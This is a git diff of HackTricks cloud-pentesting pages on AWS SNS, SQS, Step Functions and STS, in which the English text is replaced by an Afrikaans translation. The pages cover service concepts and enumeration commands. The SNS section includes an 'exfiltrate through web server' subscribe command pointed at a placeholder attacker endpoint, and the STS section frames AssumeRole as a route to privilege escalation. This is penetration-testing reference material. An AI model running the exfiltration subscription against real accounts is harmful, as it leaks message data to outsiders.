+--protocol email \
+--notification-endpoint my-email@example.com
 
 # Exfiltrate through web server
 ## You will receive an initial request with a URL in the field "SubscribeURL"
 ## that you need to access to confirm the subscription
 aws sns subscribe --region <region>\
-    --protocol http \
-    --notification-endpoint http://<attacker>/ \
-    --topic-arn <arn>
+--protocol http \
+--notification-endpoint http://<attacker>/ \
+--topic-arn <arn>
 ```
-
 > [!CAUTION]
-> Note that if the **topic is of type FIFO**, only subscribers using the protocol **SQS** can be used (HTTP or HTTPS cannot be used).
+> Let daarop dat as die **onderwerp van tipe FIFO** is, slegs intekenaars wat die protokol **SQS** gebruik, gebruik kan word (HTTP of HTTPS kan nie gebruik word nie).
 >
-> Also, even if the `--topic-arn` contains the region make sure you specify the correct region in **`--region`** or you will get an error that looks like indicate that you don't have access but the problem is the region.
+> Ook, selfs al bevat die `--topic-arn` die streek, maak seker dat jy die korrekte streek in **`--region`** spesifiseer of jy sal 'n fout kry wat lyk asof dit aandui dat jy nie toegang het nie, maar die probleem is die streek.
 
 #### Unauthenticated Access
 
@@ -77,7 +75,3 @@ aws sns subscribe --region <region>\
 - [https://aws.amazon.com/about-aws/whats-new/2022/01/amazon-sns-attribute-based-access-controls/](https://aws.amazon.com/about-aws/whats-new/2022/01/amazon-sns-attribute-based-access-controls/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md
index 1da888587..c4f8d210f 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md
@@ -4,10 +4,9 @@
 
 ## SQS
 
-Amazon Simple Queue Service (SQS) is presented as a **fully managed message queuing service**. Its main function is to assist in the scaling and decoupling of microservices, distributed systems, and serverless applications. The service is designed to remove the need for managing and operating message-oriented middleware, which can often be complex and resource-intensive. This elimination of complexity allows developers to direct their efforts towards more innovative and differentiating aspects of their work.
+Amazon Simple Queue Service (SQS) word aangebied as 'n **volledig bestuurde boodskap-ry-diens**. Die hooffunksie is om te help met die skaal en ontkoppeling van mikrodiens, verspreide stelsels en serverless toepassings. Die diens is ontwerp om die behoefte aan die bestuur en werking van boodskap-georiënteerde middleware te verwyder, wat dikwels kompleks en hulpbron-intensief kan wees. Hierdie verwydering van kompleksiteit stel ontwikkelaars in staat om hul pogings te rig op meer innoverende en onderskeidende aspekte van hul werk.
 
 ### Enumeration
-
 ```bash
 # Get queues info
 aws sqs list-queues
@@ -18,9 +17,8 @@ aws sqs receive-message --queue-url <value>
 
 aws sqs send-message --queue-url <value> --message-body <value>
 ```
-
 > [!CAUTION]
-> Also, even if the `--queue-url` contains the region make sure you specify the correct region in **`--region`** or you will get an error that looks like indicate that you don't have access but the problem is the region.
+> Ook, selfs al bevat die `--queue-url` die streek, maak seker dat jy die korrekte streek in **`--region`** spesifiseer of jy sal 'n fout kry wat lyk asof dit aandui dat jy nie toegang het nie, maar die probleem is die streek.
 
 #### Unauthenticated Access
 
@@ -51,7 +49,3 @@ aws sqs send-message --queue-url <value> --message-body <value>
 - https://docs.aws.amazon.com/cdk/api/v2/python/aws\_cdk.aws\_sqs/README.html
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md
index 873629bba..7e65a0537 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md
@@ -4,266 +4,253 @@
 
 ## Step Functions
 
-AWS Step Functions is a workflow service that enables you to coordinate and orchestrate multiple AWS services into serverless workflows. By using AWS Step Functions, you can design and run workflows that connect various AWS services such as AWS Lambda, Amazon S3, Amazon DynamoDB, and many more, in a sequence of steps. This orchestration service provides a visual workflow interface and offers **state machine** capabilities, allowing you to define each step of the workflow in a declarative manner using JSON-based **Amazon States Language** (ASL).
+AWS Step Functions is 'n werksvloei-diens wat jou in staat stel om verskeie AWS-dienste in serverless werksvloeie te koördineer en te orkestreer. Deur AWS Step Functions te gebruik, kan jy werksvloeie ontwerp en uitvoer wat verskillende AWS-dienste soos AWS Lambda, Amazon S3, Amazon DynamoDB, en vele meer, in 'n reeks stappe verbind. Hierdie orkestrasiediens bied 'n visuele werksvloei-koppelvlak en bied **state machine** vermoëns, wat jou toelaat om elke stap van die werksvloei op 'n deklaratiewe manier te definieer met behulp van JSON-gebaseerde **Amazon States Language** (ASL).
 
 ## Key concepts
 
 ### Standard vs. Express Workflows
 
-AWS Step Functions offers two types of **state machine workflows**: Standard and Express.
+AWS Step Functions bied twee tipes **state machine workflows**: Standaard en Uitdrukking.
 
-- **Standard Workflow**: This default workflow type is designed for long-running, durable, and auditable processes. It supports **exactly-once execution**, ensuring tasks run only once unless retries are specified. It is ideal for workflows needing detailed execution history and can run for up to one year.
-- **Express Workflow**: This type is ideal for high-volume, short-duration tasks, running up to five minutes. They support **at-least-once execution**, suitable for idempotent tasks like data processing. These workflows are optimized for cost and performance, charging based on executions, duration, and memory usage.
+- **Standard Workflow**: Hierdie standaard werksvloei tipe is ontwerp vir langlopende, duursame, en auditeerbare prosesse. Dit ondersteun **exactly-once execution**, wat verseker dat take slegs een keer uitgevoer word tensy herhalings gespesifiseer word. Dit is ideaal vir werksvloeie wat gedetailleerde uitvoeringsgeskiedenis benodig en kan tot een jaar lank loop.
+- **Express Workflow**: Hierdie tipe is ideaal vir hoë-volume, kortduur take, wat tot vyf minute duur. Hulle ondersteun **at-least-once execution**, geskik vir idempotente take soos data verwerking. Hierdie werksvloeie is geoptimaliseer vir koste en prestasie, en hef koste gebaseer op uitvoerings, duur, en geheuegebruik.
 
 ### States
 
-States are the essential units of state machines. They define the individual steps within a workflow, being able to perform a variety of functions depending on its type:
+States is die essensiële eenhede van state machines. Hulle definieer die individuele stappe binne 'n werksvloei, en kan 'n verskeidenheid funksies uitvoer, afhangende van sy tipe:
 
-- **Task:** Executes a job, often using an AWS service like Lambda.
-- **Choice:** Makes decisions based on input.
-- **Fail/Succeed:** Ends the execution with a failure or success.
-- **Pass:** Passes input to output or injects data.
-- **Wait:** Delays execution for a set time.
-- **Parallel:** Initiates parallel branches.
-- **Map:** Dynamically iterates steps over items.
+- **Task:** Voer 'n werk uit, dikwels met 'n AWS-diens soos Lambda.
+- **Choice:** Neem besluite gebaseer op invoer.
+- **Fail/Succeed:** Eindig die uitvoering met 'n mislukking of sukses.
+- **Pass:** Gee invoer aan uitvoer of voeg data in.
+- **Wait:** Vertraag uitvoering vir 'n bepaalde tyd.
+- **Parallel:** Begin parallelle takke.
+- **Map:** Dinamies herhaal stappe oor items.
 
 ### Task
 
-A **Task** state represents a single unit of work executed by a state machine. Tasks can invoke various resources, including activities, Lambda functions, AWS services, or third-party APIs.
+'n **Task** state verteenwoordig 'n enkele eenheid van werk wat deur 'n state machine uitgevoer word. Take kan verskeie hulpbronne aanroep, insluitend aktiwiteite, Lambda funksies, AWS dienste, of derdeparty API's.
 
-- **Activities**: Custom workers you manage, suitable for long-running processes.
-  - Resource: **`arn:aws:states:region:account:activity:name`**.
-- **Lambda Functions**: Executes AWS Lambda functions.
-  - Resource: **`arn:aws:lambda:region:account:function:function-name`**.
-- **AWS Services**: Integrates directly with other AWS services, like DynamoDB or S3.
-  - Resource: **`arn:partition:states:region:account:servicename:APIname`**.
-- **HTTP Task**: Calls third-party APIs.
-  - Resource field: **`arn:aws:states:::http:invoke`**. Then, you should provide the API endpoint configuration details, such as the API URL, method, and authentication details.
-
-The following example shows a Task state definition that invokes a Lambda function called HelloWorld:
+- **Activities**: Pasgemaakte werkers wat jy bestuur, geskik vir langlopende prosesse.
+- Hulpbron: **`arn:aws:states:region:account:activity:name`**.
+- **Lambda Functions**: Voer AWS Lambda funksies uit.
+- Hulpbron: **`arn:aws:lambda:region:account:function:function-name`**.
+- **AWS Services**: Integreer direk met ander AWS dienste, soos DynamoDB of S3.
+- Hulpbron: **`arn:partition:states:region:account:servicename:APIname`**.
+- **HTTP Task**: Roep derdeparty API's aan.
+- Hulpbron veld: **`arn:aws:states:::http:invoke`**. Dan moet jy die API eindpunt konfigurasie besonderhede verskaf, soos die API URL, metode, en outentikasie besonderhede.
 
+Die volgende voorbeeld toon 'n Task state definisie wat 'n Lambda funksie genaamd HelloWorld aanroep:
 ```json
 "HelloWorld": {
-  "Type": "Task",
-  "Resource": "arn:aws:states:::lambda:invoke",
-  "Parameters": {
-    "Payload.$": "$",
-    "FunctionName": "arn:aws:lambda:<region>:<account-id>:function:HelloWorld"
-  },
-  "End": true
+"Type": "Task",
+"Resource": "arn:aws:states:::lambda:invoke",
+"Parameters": {
+"Payload.$": "$",
+"FunctionName": "arn:aws:lambda:<region>:<account-id>:function:HelloWorld"
+},
+"End": true
 }
 ```
+### Keuse
 
-### Choice
+'n **Keuse** toestand voeg voorwaardelike logika by 'n werksvloei, wat besluite op grond van invoerdata moontlik maak. Dit evalueer die gespesifiseerde voorwaardes en oorweeg na die ooreenstemmende toestand op grond van die resultate.
 
-A **Choice** state adds conditional logic to a workflow, enabling decisions based on input data. It evaluates the specified conditions and transitions to the corresponding state based on the results.
-
-- **Comparison**: Each choice rule includes a comparison operator (e.g., **`NumericEquals`**, **`StringEquals`**) that compares an input variable to a specified value or another variable.
-- **Next Field**: Choice states do not support don't support the **`End`** field, instead, they define the **`Next`** state to transition to if the comparison is true.
-
-Example of **Choice** state:
+- **Vergelyking**: Elke keuse-reël sluit 'n vergelykingsoperateur in (bv. **`NumericEquals`**, **`StringEquals`**) wat 'n invoer veranderlike met 'n gespesifiseerde waarde of 'n ander veranderlike vergelyk.
+- **Volgende Veld**: Keuse toestande ondersteun nie die **`End`** veld nie, eerder definieer hulle die **`Next`** toestand om na oor te skakel as die vergelyking waar is.
 
+Voorbeeld van **Keuse** toestand:
 ```json
 {
-  "Variable": "$.timeStamp",
-  "TimestampEquals": "2000-01-01T00:00:00Z",
-  "Next": "TimeState"
+"Variable": "$.timeStamp",
+"TimestampEquals": "2000-01-01T00:00:00Z",
+"Next": "TimeState"
 }
 ```
-
 ### Fail/Succeed
 
-A **`Fail`** state stops the execution of a state machine and marks it as a failure. It is used to specify an error name and a cause, providing details about the failure. This state is terminal, meaning it ends the execution flow.
+'n **`Fail`** toestand stop die uitvoering van 'n toestandmasjien en merk dit as 'n mislukking. Dit word gebruik om 'n foutnaam en 'n oorsaak te spesifiseer, wat besonderhede oor die mislukking verskaf. Hierdie toestand is terminal, wat beteken dit beëindig die uitvoeringsvloei.
 
-A **`Succeed`** state stops the execution successfully. It is typically used to terminate the workflow when it completes successfully. This state does not require a **`Next`** field.
+'n **`Succeed`** toestand stop die uitvoering suksesvol. Dit word tipies gebruik om die werksvloei te beëindig wanneer dit suksesvol voltooi is. Hierdie toestand vereis nie 'n **`Next`** veld nie.
 
 {{#tabs }}
 {{#tab name="Fail example" }}
-
 ```json
 "FailState": {
-  "Type": "Fail",
-  "Error": "ErrorName",
-  "Cause": "Error details"
+"Type": "Fail",
+"Error": "ErrorName",
+"Cause": "Error details"
 }
 ```
-
 {{#endtab }}
 
-{{#tab name="Succeed example" }}
-
+{{#tab name="Sukses voorbeeld" }}
 ```json
 "SuccessState": {
-  "Type": "Succeed"
+"Type": "Succeed"
 }
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
 ### Pass
 
-A **Pass** state passes its input to its output either without performing any work or transformin JSON state input using filters, and then passing the transformed data to the next state. It is useful for testing and constructing state machines, allowing you to inject static data or transform it.
-
+'n **Pass** toestand gee sy invoer aan sy uitvoer oor, hetsy sonder om enige werk te verrig of deur JSON toestand invoer te transformeer met behulp van filters, en dan die getransformeerde data aan die volgende toestand oor te dra. Dit is nuttig vir toetsing en die konstruksie van toestandmasjiene, wat jou toelaat om statiese data in te voeg of dit te transformeer.
 ```json
 "PassState": {
-  "Type": "Pass",
-  "Result": {"key": "value"},
-  "ResultPath": "$.newField",
-  "Next": "NextState"
+"Type": "Pass",
+"Result": {"key": "value"},
+"ResultPath": "$.newField",
+"Next": "NextState"
+}
+```
+### Wag
+
+'n **Wag** toestand vertraag die uitvoering van die toestandmasjien vir 'n spesifieke duur. Daar is drie primêre metodes om die wagtyd te konfigureer:
+
+- **X Sekondes**: 'n Vasgestelde aantal sekondes om te wag.
+
+```json
+"WaitState": {
+"Type": "Wait",
+"Seconds": 10,
+"Next": "NextState"
 }
 ```
 
-### Wait
+- **Absoluut Tydstempel**: 'n Presiese tyd om te wag tot.
 
-A **Wait** state delays the execution of the state machine for a specified duration. There are three primary methods to configure the wait time:
+```json
+"WaitState": {
+"Type": "Wait",
+"Timestamp": "2024-03-14T01:59:00Z",
+"Next": "NextState"
+}
+```
 
-- **X Seconds**: A fixed number of seconds to wait.
+- **Dinamiese Wag**: Gebaseer op invoer met behulp van **`SecondsPath`** of **`TimestampPath`**.
 
-  ```json
-  "WaitState": {
-  	"Type": "Wait",
-  	"Seconds": 10,
-  	"Next": "NextState"
-  }
-  ```
-
-- **Absolute Timestamp**: An exact time to wait until.
-
-  ```json
-  "WaitState": {
-    "Type": "Wait",
-    "Timestamp": "2024-03-14T01:59:00Z",
-    "Next": "NextState"
-  }
-  ```
-
-- **Dynamic Wait**: Based on input using **`SecondsPath`** or **`TimestampPath`**.
-
-  ```json
-  jsonCopiar código
-  "WaitState": {
-    "Type": "Wait",
-    "TimestampPath": "$.expirydate",
-    "Next": "NextState"
-  }
-  ```
+```json
+jsonCopiar código
+"WaitState": {
+"Type": "Wait",
+"TimestampPath": "$.expirydate",
+"Next": "NextState"
+}
+```
 
 ### Parallel
 
-A **Parallel** state allows you to execute multiple branches of tasks concurrently within your workflow. Each branch runs independently and processes its own sequence of states. The execution waits until all branches complete before proceeding to the next state. Its key fields are:
-
-- **Branches**: An array defining the parallel execution paths. Each branch is a separate state machine.
-- **ResultPath**: Defines where (in the input) to place the combined output of the branches.
-- **Retry and Catch**: Error handling configurations for the parallel state.
+'n **Parallel** toestand laat jou toe om verskeie takke van take gelyktydig binne jou werksvloei uit te voer. Elke tak loop onafhanklik en verwerk sy eie volgorde van toestande. Die uitvoering wag totdat al die takke voltooi is voordat dit na die volgende toestand gaan. Sy sleutelvelde is:
 
+- **Takke**: 'n Array wat die parallelle uitvoeringspaaie definieer. Elke tak is 'n aparte toestandmasjien.
+- **ResultPath**: Definieer waar (in die invoer) om die saamgevoegde uitvoer van die takke te plaas.
+- **Herhaal en Vang**: Fouthanteringskonfigurasies vir die parallelle toestand.
 ```json
 "ParallelState": {
-  "Type": "Parallel",
-  "Branches": [
-    {
-      "StartAt": "Task1",
-      "States": { ... }
-    },
-    {
-      "StartAt": "Task2",
-      "States": { ... }
-    }
-  ],
-  "Next": "NextState"
+"Type": "Parallel",
+"Branches": [
+{
+"StartAt": "Task1",
+"States": { ... }
+},
+{
+"StartAt": "Task2",
+"States": { ... }
+}
+],
+"Next": "NextState"
+}
+```
+### Map
+
+'n **Map** toestand stel die uitvoering van 'n stel stappe vir elke item in 'n dataset in staat. Dit word gebruik vir parallelle verwerking van data. Afhangende van hoe jy die items van die dataset wil verwerk, bied Step Functions die volgende modi aan:
+
+- **Inline Mode**: Voer 'n substel van toestande uit vir elke JSON-array item. Geschik vir klein skaal take met minder as 40 parallelle iterasies, wat elkeen in die konteks van die werksvloei wat die **`Map`** toestand bevat, loop.
+
+```json
+"MapState": {
+"Type": "Map",
+"ItemsPath": "$.arrayItems",
+"ItemProcessor": {
+"ProcessorConfig": {
+"Mode": "INLINE"
+},
+"StartAt": "AddState",
+"States": {
+"AddState": {
+"Type": "Task",
+"Resource": "arn:aws:states:::lambda:invoke",
+"OutputPath": "$.Payload",
+"Parameters": {
+"FunctionName": "arn:aws:lambda:<region>:<account-id>:function:add-function"
+},
+"End": true
+}
+}
+},
+"End": true
+"ResultPath": "$.detail.added",
+"ItemsPath": "$.added"
 }
 ```
 
-### Map
+- **Distributed Mode**: Ontwerp vir groot skaal parallelle verwerking met hoë mededinging. Ondersteun die verwerking van groot datasets, soos dié wat in Amazon S3 gestoor is, wat 'n hoë mededinging van tot 10,000 parallelle kind werksvloei-uitvoerings moontlik maak, wat hierdie kinders as 'n aparte kind uitvoering loop.
 
-A **Map** state enables the execution of a set of steps for each item in an dataset. It's used for parallel processing of data. Depending on how you want to process the items of the dataset, Step Functions provides the following modes:
-
-- **Inline Mode**: Executes a subset of states for each JSON array item. Suitable for small-scale tasks with less than 40 parallel iterations, running each of them in the context of the workflow that contains the **`Map`** state.
-
-  ```json
-  "MapState": {
-    "Type": "Map",
-    "ItemsPath": "$.arrayItems",
-    "ItemProcessor": {
-        "ProcessorConfig": {
-            "Mode": "INLINE"
-        },
-        "StartAt": "AddState",
-        "States": {
-            "AddState": {
-                "Type": "Task",
-                "Resource": "arn:aws:states:::lambda:invoke",
-                "OutputPath": "$.Payload",
-                "Parameters": {
-                    "FunctionName": "arn:aws:lambda:<region>:<account-id>:function:add-function"
-                },
-                "End": true
-            }
-        }
-    },
-    "End": true
-    "ResultPath": "$.detail.added",
-    "ItemsPath": "$.added"
-  }
-  ```
-
-- **Distributed Mode**: Designed for large-scale parallel processing with high concurrency. Supports processing large datasets, such as those stored in Amazon S3, enabling a high concurrency of up 10,000 parallel child workflow executions, running these child as a separate child execution.
-
-  ```json
-  "DistributedMapState": {
-    "Type": "Map",
-    "ItemReader": {
-      "Resource": "arn:aws:states:::s3:getObject",
-      "Parameters": {
-        "Bucket": "my-bucket",
-        "Key": "data.csv"
-      }
-    },
-    "ItemProcessor": {
-      "ProcessorConfig": {
-        "Mode": "DISTRIBUTED",
-        "ExecutionType": "EXPRESS"
-      },
-      "StartAt": "ProcessItem",
-      "States": {
-        "ProcessItem": {
-          "Type": "Task",
-          "Resource": "arn:aws:lambda:region:account-id:function:my-function",
-          "End": true
-  	    }
-      }
-    },
-    "End": true
-    "ResultWriter": {
-      "Resource": "arn:aws:states:::s3:putObject",
-      "Parameters": {
-        "Bucket": "myOutputBucket",
-        "Prefix": "csvProcessJobs"
-  	  }
-  	}
-  }
-  ```
+```json
+"DistributedMapState": {
+"Type": "Map",
+"ItemReader": {
+"Resource": "arn:aws:states:::s3:getObject",
+"Parameters": {
+"Bucket": "my-bucket",
+"Key": "data.csv"
+}
+},
+"ItemProcessor": {
+"ProcessorConfig": {
+"Mode": "DISTRIBUTED",
+"ExecutionType": "EXPRESS"
+},
+"StartAt": "ProcessItem",
+"States": {
+"ProcessItem": {
+"Type": "Task",
+"Resource": "arn:aws:lambda:region:account-id:function:my-function",
+"End": true
+}
+}
+},
+"End": true
+"ResultWriter": {
+"Resource": "arn:aws:states:::s3:putObject",
+"Parameters": {
+"Bucket": "myOutputBucket",
+"Prefix": "csvProcessJobs"
+}
+}
+}
+```
 
 ### Versions and aliases
 
-Step Functions also lets you manage workflow deployments through **versions** and **aliases** of state machines. A version represents a snapshot of a state machine that can be executed. Aliases serve as pointers to up to two versions of a state machine.
+Step Functions laat jou ook toe om werksvloei-implementasies te bestuur deur middel van **versies** en **aliases** van toestand masjiene. 'n Weergawe verteenwoordig 'n snapshot van 'n toestand masjien wat uitgevoer kan word. Aliases dien as wysers na tot twee weergawes van 'n toestand masjien.
 
-- **Versions**: These immutable snapshots of a state machine are created from the most recent revision of that state machine. Each version is identified by a unique ARN that combines the state machine ARN with the version number, separated by a colon (**`arn:aws:states:region:account-id:stateMachine:StateMachineName:version-number`**). Versions cannot be edited, but you can update the state machine and publish a new version, or use the desired state machine version.
-- **Aliases**: These pointers can reference up to two versions of the same state machine. Multiple aliases can be created for a single state machine, each identified by a unique ARN constructed by combining the state machine ARN with the alias name, separated by a colon (**`arn:aws:states:region:account-id:stateMachine:StateMachineName:aliasName`**). Aliases enable routing of traffic between one of the two versions of a state machine. Alternatively, an alias can point to a single specific version of the state machine, but not to other aliases. They can be updated to redirect to a different version of the state machine as needed, facilitating controlled deployments and workflow management.
+- **Versies**: Hierdie onveranderlike snapshots van 'n toestand masjien word geskep vanaf die mees onlangse hersiening van daardie toestand masjien. Elke weergawe word geïdentifiseer deur 'n unieke ARN wat die toestand masjien ARN met die weergawe nommer kombineer, geskei deur 'n dubbelepunt (**`arn:aws:states:region:account-id:stateMachine:StateMachineName:version-number`**). Weergawes kan nie ge-edit word nie, maar jy kan die toestand masjien opdateer en 'n nuwe weergawe publiseer, of die gewenste toestand masjien weergawe gebruik.
+- **Aliases**: Hierdie wysers kan na tot twee weergawes van dieselfde toestand masjien verwys. Meerdere aliases kan geskep word vir 'n enkele toestand masjien, elkeen geïdentifiseer deur 'n unieke ARN wat die toestand masjien ARN met die alias naam kombineer, geskei deur 'n dubbelepunt (**`arn:aws:states:region:account-id:stateMachine:StateMachineName:aliasName`**). Aliases stel die roetering van verkeer tussen een van die twee weergawes van 'n toestand masjien in staat. Alternatiewelik kan 'n alias na 'n enkele spesifieke weergawe van die toestand masjien wys, maar nie na ander aliases nie. Hulle kan opdateer word om na 'n ander weergawe van die toestand masjien te herlei soos nodig, wat beheerde implementasies en werksvloei bestuur fasiliteer.
 
-For more detailed information about **ASL**, check: [**Amazon States Language**](https://states-language.net/spec.html).
+Vir meer gedetailleerde inligting oor **ASL**, kyk: [**Amazon States Language**](https://states-language.net/spec.html).
 
 ## IAM Roles for State machines
 
-AWS Step Functions utilizes AWS Identity and Access Management (IAM) roles to control access to resources and actions within state machines. Here are the key aspects related to security and IAM roles in AWS Step Functions:
+AWS Step Functions gebruik AWS Identity and Access Management (IAM) rolle om toegang tot hulpbronne en aksies binne toestand masjiene te beheer. Hier is die sleutel aspekte wat verband hou met sekuriteit en IAM rolle in AWS Step Functions:
 
-- **Execution Role**: Each state machine in AWS Step Functions is associated with an IAM execution role. This role defines what actions the state machine can perform on your behalf. When a state machine transitions between states that interact with AWS services (like invoking Lambda functions, accessing DynamoDB, etc.), it assumes this execution role to carry out those actions.
-- **Permissions**: The IAM execution role must be configured with permissions that allow the necessary actions on other AWS services. For example, if your state machine needs to invoke AWS Lambda functions, the IAM role must have **`lambda:InvokeFunction`** permissions. Similarly, if it needs to write to DynamoDB, appropriate permissions (**`dynamodb:PutItem`**, **`dynamodb:UpdateItem`**, etc.) must be granted.
+- **Execution Role**: Elke toestand masjien in AWS Step Functions is geassosieer met 'n IAM uitvoering rol. Hierdie rol definieer watter aksies die toestand masjien namens jou kan uitvoer. Wanneer 'n toestand masjien tussen toestande oorgaan wat met AWS dienste interaksie het (soos die aanroep van Lambda funksies, toegang tot DynamoDB, ens.), neem dit hierdie uitvoering rol aan om daardie aksies uit te voer.
+- **Permissions**: Die IAM uitvoering rol moet geconfigureer word met toestemmings wat die nodige aksies op ander AWS dienste toelaat. Byvoorbeeld, as jou toestand masjien AWS Lambda funksies moet aanroep, moet die IAM rol **`lambda:InvokeFunction`** toestemmings hê. Op soortgelyke wyse, as dit na DynamoDB moet skryf, moet toepaslike toestemmings (**`dynamodb:PutItem`**, **`dynamodb:UpdateItem`**, ens.) toegestaan word.
 
 ## Enumeration
 
-ReadOnlyAccess policy is enough for all the following enumeration actions.
-
+ReadOnlyAccess beleid is genoeg vir al die volgende enumerasie aksies.
 ```bash
 # State machines #
 
@@ -310,10 +297,9 @@ aws stepfunctions describe-map-run --map-run-arn <value>
 ## Lists executions of a Map Run
 aws stepfunctions list-executions --map-run-arn <value> [--status-filter <RUNNING | SUCCEEDED | FAILED | TIMED_OUT | ABORTED | PENDING_REDRIVE>] [--redrive-filter <REDRIVEN | NOT_REDRIVEN>]
 ```
-
 ## Privesc
 
-In the following page, you can check how to **abuse Step Functions permissions to escalate privileges**:
+In die volgende bladsy kan jy kyk hoe om **Step Functions toestemming te misbruik om voorregte te verhoog**:
 
 {{#ref}}
 ../aws-privilege-escalation/aws-stepfunctions-privesc.md
@@ -338,7 +324,3 @@ In the following page, you can check how to **abuse Step Functions permissions t
 - [https://states-language.net/spec.html](https://states-language.net/spec.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md
index 385d55c3b..675d52d11 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md
@@ -4,62 +4,57 @@
 
 ## STS
 
-**AWS Security Token Service (STS)** is primarily designed to issue **temporary, limited-privilege credentials**. These credentials can be requested for **AWS Identity and Access Management (IAM)** users or for authenticated users (federated users).
+**AWS Security Token Service (STS)** is hoofsaaklik ontwerp om **tydelike, beperkte bevoegdheid akkrediteerbare** te verskaf. Hierdie akkrediteerbare kan aangevra word vir **AWS Identity and Access Management (IAM)** gebruikers of vir geverifieerde gebruikers (gefedereerde gebruikers).
 
-Given that STS's purpose is to **issue credentials for identity impersonation**, the service is immensely valuable for **escalating privileges and maintaining persistence**, even though it might not have a wide array of options.
+Aangesien STS se doel is om **akkrediteerbare vir identiteit se vervalsing** uit te reik, is die diens uiters waardevol vir **bevoegdheidstoename en volgehoue volharding**, selfs al het dit dalk nie 'n wye verskeidenheid opsies nie.
 
 ### Assume Role Impersonation
 
-The action [AssumeRole](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html) provided by AWS STS is crucial as it permits a principal to acquire credentials for another principal, essentially impersonating them. Upon invocation, it responds with an access key ID, a secret key, and a session token corresponding to the specified ARN.
+Die aksie [AssumeRole](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html) wat deur AWS STS verskaf word, is van kardinale belang aangesien dit 'n hoofrol toelaat om akkrediteerbare vir 'n ander hoofrol te verkry, wat hulle essensieel vervals. By aanroep, antwoord dit met 'n toegang sleutel ID, 'n geheime sleutel, en 'n sessie token wat ooreenstem met die gespesifiseerde ARN.
 
-For Penetration Testers or Red Team members, this technique is instrumental for privilege escalation (as elaborated [**here**](../aws-privilege-escalation/aws-sts-privesc.md#sts-assumerole)). However, it's worth noting that this technique is quite conspicuous and may not catch an attacker off guard.
+Vir Penetration Testers of Red Team lede, is hierdie tegniek instrumenteel vir bevoegdheidstoename (soos uitgebreider [**hier**](../aws-privilege-escalation/aws-sts-privesc.md#sts-assumerole)). Dit is egter die moeite werd om te noem dat hierdie tegniek redelik opvallend is en mag nie 'n aanvaller onbewus vang nie.
 
 #### Assume Role Logic
 
-In order to assume a role in the same account if the **role to assume is allowing specifically a role ARN** like in:
-
+Om 'n rol in dieselfde rekening aan te neem, as die **rol om aan te neem spesifiek 'n rol ARN toelaat** soos in:
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "arn:aws:iam::<acc_id>:role/priv-role"
-      },
-      "Action": "sts:AssumeRole",
-      "Condition": {}
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::<acc_id>:role/priv-role"
+},
+"Action": "sts:AssumeRole",
+"Condition": {}
+}
+]
 }
 ```
+Die rol **`priv-role`** in hierdie geval, **hoef nie spesifiek toegelaat te word** om daardie rol aan te neem (met daardie toelae is genoeg).
 
-The role **`priv-role`** in this case, **doesn't need to be specifically allowed** to assume that role (with that allowance is enough).
-
-However, if a role is allowing an account to assume it, like in:
-
+Maar, as 'n rol 'n rekening toelaat om dit aan te neem, soos in:
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "arn:aws:iam::<acc_id>:root"
-      },
-      "Action": "sts:AssumeRole",
-      "Condition": {}
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::<acc_id>:root"
+},
+"Action": "sts:AssumeRole",
+"Condition": {}
+}
+]
 }
 ```
+Die rol wat probeer om aan te neem, sal 'n **spesifieke `sts:AssumeRole` toestemming** oor daardie rol **nodig hê om dit aan te neem**.
 
-The role trying to assume it will need a **specific `sts:AssumeRole` permission** over that role **to assume it**.
-
-If you try to assume a **role** **from a different account**, the **assumed role must allow it** (indicating the role **ARN** or the **external account**), and the **role trying to assume** the other one **MUST** to h**ave permissions to assume it** (in this case this isn't optional even if the assumed role is specifying an ARN).
+As jy probeer om 'n **rol** **van 'n ander rekening** aan te neem, moet die **aangenome rol dit toelaat** (wat die rol **ARN** of die **eksterne rekening** aandui), en die **rol wat probeer om die ander een aan te neem** **MOET** **toestemmings hê om dit aan te neem** (in hierdie geval is dit nie opsioneel nie, selfs al spesifiseer die aangeneemde rol 'n ARN).
 
 ### Enumeration
-
 ```bash
 # Get basic info of the creds
 aws sts get-caller-identity
@@ -72,10 +67,9 @@ aws sts get-session-token
 ## MFA
 aws sts get-session-token --serial-number <arn_device> --token-code <otp_code>
 ```
-
 ### Privesc
 
-In the following page you can check how to **abuse STS permissions to escalate privileges**:
+In die volgende bladsy kan jy kyk hoe om **STS-toestemmings te misbruik om voorregte te verhoog**:
 
 {{#ref}}
 ../aws-privilege-escalation/aws-sts-privesc.md
@@ -98,7 +92,3 @@ In the following page you can check how to **abuse STS permissions to escalate p
 - [https://blog.christophetd.fr/retrieving-aws-security-credentials-from-the-aws-console/?utm_source=pocket_mylist](https://blog.christophetd.fr/retrieving-aws-security-credentials-from-the-aws-console/?utm_source=pocket_mylist)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
